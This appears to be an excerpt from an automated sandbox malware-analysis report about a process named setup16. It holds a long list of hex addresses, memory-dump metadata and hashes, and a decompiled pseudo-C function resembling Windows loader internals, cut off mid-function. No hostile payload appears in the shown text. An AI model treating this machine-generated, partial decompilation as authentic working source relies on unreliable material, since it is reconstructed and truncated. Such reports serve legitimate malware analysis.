                                                                                                                                                                                                        0x04a357dc
                                                                                                                                                                                                        0x04a357de
                                                                                                                                                                                                        0x04a357ec
                                                                                                                                                                                                        0x04a357ec
                                                                                                                                                                                                        0x04a357f1
                                                                                                                                                                                                        0x04a357f3
                                                                                                                                                                                                        0x04a357f8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a357f8
                                                                                                                                                                                                        0x04a357e0
                                                                                                                                                                                                        0x04a357e4
                                                                                                                                                                                                        0x04a357ea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a357ea
                                                                                                                                                                                                        0x049f20f4
                                                                                                                                                                                                        0x049f20f4
                                                                                                                                                                                                        0x049f20f8
                                                                                                                                                                                                        0x049f20f8
                                                                                                                                                                                                        0x049f20fc
                                                                                                                                                                                                        0x049f2100
                                                                                                                                                                                                        0x049f2106
                                                                                                                                                                                                        0x049f2201
                                                                                                                                                                                                        0x049f2206
                                                                                                                                                                                                        0x049f220b
                                                                                                                                                                                                        0x049f220e
                                                                                                                                                                                                        0x049f22a9
                                                                                                                                                                                                        0x049f22ac
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f22b2
                                                                                                                                                                                                        0x049f22b5
                                                                                                                                                                                                        0x04a35801
                                                                                                                                                                                                        0x04a35806
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35810
                                                                                                                                                                                                        0x04a35815
                                                                                                                                                                                                        0x04a35818
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3581e
                                                                                                                                                                                                        0x049f22bb
                                                                                                                                                                                                        0x049f22bb
                                                                                                                                                                                                        0x049f2218
                                                                                                                                                                                                        0x049f2218
                                                                                                                                                                                                        0x049f221c
                                                                                                                                                                                                        0x049f2220
                                                                                                                                                                                                        0x049f2222
                                                                                                                                                                                                        0x049f22c2
                                                                                                                                                                                                        0x049f22c4
                                                                                                                                                                                                        0x049f22dc
                                                                                                                                                                                                        0x049f22dc
                                                                                                                                                                                                        0x049f22e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f22e7
                                                                                                                                                                                                        0x049f22c8
                                                                                                                                                                                                        0x049f22cd
                                                                                                                                                                                                        0x049f22d3
                                                                                                                                                                                                        0x049f22d6
                                                                                                                                                                                                        0x04a35823
                                                                                                                                                                                                        0x04a35825
                                                                                                                                                                                                        0x04a35827
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3582d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3582d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2228
                                                                                                                                                                                                        0x049f2228
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2228
                                                                                                                                                                                                        0x049f2222
                                                                                                                                                                                                        0x049f2214
                                                                                                                                                                                                        0x049f2214
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2114
                                                                                                                                                                                                        0x049f2114
                                                                                                                                                                                                        0x049f2114
                                                                                                                                                                                                        0x049f211a
                                                                                                                                                                                                        0x049f211c
                                                                                                                                                                                                        0x049f2348
                                                                                                                                                                                                        0x049f234d
                                                                                                                                                                                                        0x04a35840
                                                                                                                                                                                                        0x04a35845
                                                                                                                                                                                                        0x04a35848
                                                                                                                                                                                                        0x04a3584e
                                                                                                                                                                                                        0x04a3584e
                                                                                                                                                                                                        0x04a35848
                                                                                                                                                                                                        0x049f2353
                                                                                                                                                                                                        0x049f2355
                                                                                                                                                                                                        0x049f2388
                                                                                                                                                                                                        0x049f2388
                                                                                                                                                                                                        0x049f2368
                                                                                                                                                                                                        0x049f236a
                                                                                                                                                                                                        0x049f236c
                                                                                                                                                                                                        0x049f238f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f236e
                                                                                                                                                                                                        0x049f236e
                                                                                                                                                                                                        0x049f218e
                                                                                                                                                                                                        0x049f218e
                                                                                                                                                                                                        0x049f2191
                                                                                                                                                                                                        0x049f2195
                                                                                                                                                                                                        0x04a35a03
                                                                                                                                                                                                        0x04a35a06
                                                                                                                                                                                                        0x04a35a0c
                                                                                                                                                                                                        0x04a35a0f
                                                                                                                                                                                                        0x04a35a11
                                                                                                                                                                                                        0x04a35a13
                                                                                                                                                                                                        0x04a35a13
                                                                                                                                                                                                        0x04a35a19
                                                                                                                                                                                                        0x04a35a1f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f219b
                                                                                                                                                                                                        0x049f219b
                                                                                                                                                                                                        0x049f21a0
                                                                                                                                                                                                        0x049f2282
                                                                                                                                                                                                        0x049f2284
                                                                                                                                                                                                        0x049f2284
                                                                                                                                                                                                        0x049f2284
                                                                                                                                                                                                        0x049f2284
                                                                                                                                                                                                        0x049f21a6
                                                                                                                                                                                                        0x049f21a9
                                                                                                                                                                                                        0x049f21ac
                                                                                                                                                                                                        0x049f21ae
                                                                                                                                                                                                        0x049f21b3
                                                                                                                                                                                                        0x049f228b
                                                                                                                                                                                                        0x049f2290
                                                                                                                                                                                                        0x049f2379
                                                                                                                                                                                                        0x049f2296
                                                                                                                                                                                                        0x049f2298
                                                                                                                                                                                                        0x049f2298
                                                                                                                                                                                                        0x049f2290
                                                                                                                                                                                                        0x049f21b9
                                                                                                                                                                                                        0x049f21be
                                                                                                                                                                                                        0x049f22a2
                                                                                                                                                                                                        0x049f22a2
                                                                                                                                                                                                        0x049f21c4
                                                                                                                                                                                                        0x049f21c8
                                                                                                                                                                                                        0x049f21cc
                                                                                                                                                                                                        0x049f21d0
                                                                                                                                                                                                        0x049f21d4
                                                                                                                                                                                                        0x049f21de
                                                                                                                                                                                                        0x049f21e3
                                                                                                                                                                                                        0x04a35a29
                                                                                                                                                                                                        0x04a35a2c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35a3b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f21e9
                                                                                                                                                                                                        0x049f21e9
                                                                                                                                                                                                        0x049f21e9
                                                                                                                                                                                                        0x049f21ee
                                                                                                                                                                                                        0x049f21f1
                                                                                                                                                                                                        0x04a35a45
                                                                                                                                                                                                        0x04a35a4b
                                                                                                                                                                                                        0x04a35a52
                                                                                                                                                                                                        0x04a35a58
                                                                                                                                                                                                        0x04a35a5d
                                                                                                                                                                                                        0x04a35a5f
                                                                                                                                                                                                        0x04a35a71
                                                                                                                                                                                                        0x04a35a61
                                                                                                                                                                                                        0x04a35a6a
                                                                                                                                                                                                        0x04a35a6a
                                                                                                                                                                                                        0x04a35a76
                                                                                                                                                                                                        0x04a35a79
                                                                                                                                                                                                        0x04a35a7f
                                                                                                                                                                                                        0x04a35a83
                                                                                                                                                                                                        0x04a35a85
                                                                                                                                                                                                        0x04a35a87
                                                                                                                                                                                                        0x04a35a87
                                                                                                                                                                                                        0x04a35a8c
                                                                                                                                                                                                        0x04a35a91
                                                                                                                                                                                                        0x04a35a97
                                                                                                                                                                                                        0x04a35a9f
                                                                                                                                                                                                        0x04a35aa0
                                                                                                                                                                                                        0x04a35aa1
                                                                                                                                                                                                        0x04a35aa6
                                                                                                                                                                                                        0x04a35aab
                                                                                                                                                                                                        0x04a35ab1
                                                                                                                                                                                                        0x04a35ab3
                                                                                                                                                                                                        0x04a35ab9
                                                                                                                                                                                                        0x04a35aca
                                                                                                                                                                                                        0x04a35ad4
                                                                                                                                                                                                        0x04a35ad4
                                                                                                                                                                                                        0x04a35ade
                                                                                                                                                                                                        0x04a35ade
                                                                                                                                                                                                        0x04a35aab
                                                                                                                                                                                                        0x04a35a79
                                                                                                                                                                                                        0x04a35a52
                                                                                                                                                                                                        0x049f21f7
                                                                                                                                                                                                        0x049f21f9
                                                                                                                                                                                                        0x049f21fe
                                                                                                                                                                                                        0x049f21fe
                                                                                                                                                                                                        0x049f21e3
                                                                                                                                                                                                        0x049f2195
                                                                                                                                                                                                        0x049f236c
                                                                                                                                                                                                        0x049f2122
                                                                                                                                                                                                        0x049f2122
                                                                                                                                                                                                        0x049f2124
                                                                                                                                                                                                        0x049f2231
                                                                                                                                                                                                        0x049f2236
                                                                                                                                                                                                        0x049f2236
                                                                                                                                                                                                        0x049f2238
                                                                                                                                                                                                        0x049f2238
                                                                                                                                                                                                        0x049f2240
                                                                                                                                                                                                        0x049f2242
                                                                                                                                                                                                        0x049f2244
                                                                                                                                                                                                        0x04a359fc
                                                                                                                                                                                                        0x049f218c
                                                                                                                                                                                                        0x049f218c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f218c
                                                                                                                                                                                                        0x049f224a
                                                                                                                                                                                                        0x049f224f
                                                                                                                                                                                                        0x049f2256
                                                                                                                                                                                                        0x049f2304
                                                                                                                                                                                                        0x049f2309
                                                                                                                                                                                                        0x049f230f
                                                                                                                                                                                                        0x049f231e
                                                                                                                                                                                                        0x049f231e
                                                                                                                                                                                                        0x049f231e
                                                                                                                                                                                                        0x049f2320
                                                                                                                                                                                                        0x049f2325
                                                                                                                                                                                                        0x049f232a
                                                                                                                                                                                                        0x049f232c
                                                                                                                                                                                                        0x049f233e
                                                                                                                                                                                                        0x049f233e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f232c
                                                                                                                                                                                                        0x049f2311
                                                                                                                                                                                                        0x049f2317
                                                                                                                                                                                                        0x049f231a
                                                                                                                                                                                                        0x049f231c
                                                                                                                                                                                                        0x049f2380
                                                                                                                                                                                                        0x049f2380
                                                                                                                                                                                                        0x049f2380
                                                                                                                                                                                                        0x049f2384
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2386
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f231c
                                                                                                                                                                                                        0x049f225c
                                                                                                                                                                                                        0x049f225c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f225c
                                                                                                                                                                                                        0x049f212a
                                                                                                                                                                                                        0x049f2134
                                                                                                                                                                                                        0x049f2138
                                                                                                                                                                                                        0x049f213d
                                                                                                                                                                                                        0x04a35858
                                                                                                                                                                                                        0x04a35863
                                                                                                                                                                                                        0x04a35863
                                                                                                                                                                                                        0x04a35867
                                                                                                                                                                                                        0x04a3586a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3586c
                                                                                                                                                                                                        0x04a3586c
                                                                                                                                                                                                        0x04a35871
                                                                                                                                                                                                        0x04a35875
                                                                                                                                                                                                        0x04a35877
                                                                                                                                                                                                        0x04a35997
                                                                                                                                                                                                        0x04a3599c
                                                                                                                                                                                                        0x04a359a1
                                                                                                                                                                                                        0x04a359a7
                                                                                                                                                                                                        0x04a359a7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a359a7
                                                                                                                                                                                                        0x04a3587d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3588b
                                                                                                                                                                                                        0x04a3588b
                                                                                                                                                                                                        0x04a35890
                                                                                                                                                                                                        0x04a35892
                                                                                                                                                                                                        0x04a35894
                                                                                                                                                                                                        0x04a35899
                                                                                                                                                                                                        0x04a3589b
                                                                                                                                                                                                        0x04a358a0
                                                                                                                                                                                                        0x04a358a0
                                                                                                                                                                                                        0x04a358aa
                                                                                                                                                                                                        0x04a358b2
                                                                                                                                                                                                        0x04a358b6
                                                                                                                                                                                                        0x04a358be
                                                                                                                                                                                                        0x04a358c6
                                                                                                                                                                                                        0x04a358c9
                                                                                                                                                                                                        0x04a3590d
                                                                                                                                                                                                        0x04a35917
                                                                                                                                                                                                        0x04a3591a
                                                                                                                                                                                                        0x04a3591c
                                                                                                                                                                                                        0x04a35920
                                                                                                                                                                                                        0x04a35928
                                                                                                                                                                                                        0x04a3592a
                                                                                                                                                                                                        0x04a3592c
                                                                                                                                                                                                        0x04a3592e
                                                                                                                                                                                                        0x04a3592e
                                                                                                                                                                                                        0x04a358cb
                                                                                                                                                                                                        0x04a358cd
                                                                                                                                                                                                        0x04a358d8
                                                                                                                                                                                                        0x04a358e0
                                                                                                                                                                                                        0x04a358f4
                                                                                                                                                                                                        0x04a358fe
                                                                                                                                                                                                        0x04a358fe
                                                                                                                                                                                                        0x04a3593a
                                                                                                                                                                                                        0x04a3593e
                                                                                                                                                                                                        0x04a35940
                                                                                                                                                                                                        0x04a35942
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35944
                                                                                                                                                                                                        0x04a35944
                                                                                                                                                                                                        0x04a35949
                                                                                                                                                                                                        0x04a3594e
                                                                                                                                                                                                        0x04a3594e
                                                                                                                                                                                                        0x04a35953
                                                                                                                                                                                                        0x04a3595b
                                                                                                                                                                                                        0x04a35976
                                                                                                                                                                                                        0x04a35976
                                                                                                                                                                                                        0x04a3597a
                                                                                                                                                                                                        0x04a3597f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35981
                                                                                                                                                                                                        0x04a35981
                                                                                                                                                                                                        0x04a35981
                                                                                                                                                                                                        0x04a35983
                                                                                                                                                                                                        0x04a35988
                                                                                                                                                                                                        0x04a3598d
                                                                                                                                                                                                        0x04a35991
                                                                                                                                                                                                        0x04a35991
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3595d
                                                                                                                                                                                                        0x04a3595d
                                                                                                                                                                                                        0x04a35963
                                                                                                                                                                                                        0x04a35965
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35967
                                                                                                                                                                                                        0x04a35967
                                                                                                                                                                                                        0x04a3596b
                                                                                                                                                                                                        0x04a3596d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3596f
                                                                                                                                                                                                        0x04a35971
                                                                                                                                                                                                        0x04a35971
                                                                                                                                                                                                        0x04a35974
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35974
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35967
                                                                                                                                                                                                        0x04a3595b
                                                                                                                                                                                                        0x04a35942
                                                                                                                                                                                                        0x04a35863
                                                                                                                                                                                                        0x049f2143
                                                                                                                                                                                                        0x049f2143
                                                                                                                                                                                                        0x049f2149
                                                                                                                                                                                                        0x049f214f
                                                                                                                                                                                                        0x049f22f1
                                                                                                                                                                                                        0x049f22f6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2173
                                                                                                                                                                                                        0x049f2173
                                                                                                                                                                                                        0x049f217d
                                                                                                                                                                                                        0x049f2181
                                                                                                                                                                                                        0x049f2186
                                                                                                                                                                                                        0x04a359ae
                                                                                                                                                                                                        0x04a359b2
                                                                                                                                                                                                        0x04a359b5
                                                                                                                                                                                                        0x04a359b7
                                                                                                                                                                                                        0x04a359ba
                                                                                                                                                                                                        0x04a359cd
                                                                                                                                                                                                        0x04a359d1
                                                                                                                                                                                                        0x04a359d5
                                                                                                                                                                                                        0x04a359d9
                                                                                                                                                                                                        0x04a359db
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a359dd
                                                                                                                                                                                                        0x04a359dd
                                                                                                                                                                                                        0x04a359e1
                                                                                                                                                                                                        0x04a359e4
                                                                                                                                                                                                        0x04a359e7
                                                                                                                                                                                                        0x04a359ee
                                                                                                                                                                                                        0x04a359ee
                                                                                                                                                                                                        0x04a359f3
                                                                                                                                                                                                        0x04a359f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2186
                                                                                                                                                                                                        0x049f214f
                                                                                                                                                                                                        0x049f2106
                                                                                                                                                                                                        0x049f2266
                                                                                                                                                                                                        0x049f20d8
                                                                                                                                                                                                        0x049f20da
                                                                                                                                                                                                        0x049f20e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2ed283039352bfc2efd8ec94445f8b744bb7ca07502165e9017488542b22942e
                                                                                                                                                                                                        • Instruction ID: f9034309eb5d4beaca284a6ef6db16a97711696eb68a42beaed6d669aa305730
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ed283039352bfc2efd8ec94445f8b744bb7ca07502165e9017488542b22942e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6F1F771B083419FD725CF6CC840B6A77E6AF85314F04896DFA959B290E775F841CB82
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049DD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E049DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4abd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E049D6600(0x4ab52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4ab7b9c; // 0x0
							_t281 = L049E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04A0F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4ab7b90; // 0x77460000
								if(_t384 == 0) {
									_t353 =  *0x4ab7b8c; // 0xa729f0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E049E2280(_t200, 0x4ab84d8);
									_t277 =  *0x4ab85f4; // 0xa80378
									_t351 =  *0x4ab85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xa80310
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E049DFFB0(_t287, _t353, 0x4ab84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04A1CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E049D6600(0x4ab52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E049D7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4abb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04A4E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4ab8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x4abb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x4abb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E049E2280(_t250, 0x4ab84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04A03898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E049DFFB0(_t293, _t353, 0x4ab84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04A037F5(_t353, 0);
																}
																E04A00413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E049F9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E049F02D6(_t174);
																}
																L049E77F0( *0x4ab7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E049FC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L049DEC7F(_t353);
										L049F19B8(_t287, 0, _t353, 0);
										_t200 = E049CF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x4abb2f8 |  *0x4abb2fc) == 0 || ( *0x4abb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04A0B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x4abb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E04A76B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E04A76AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E049DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L049DEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E04A09730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
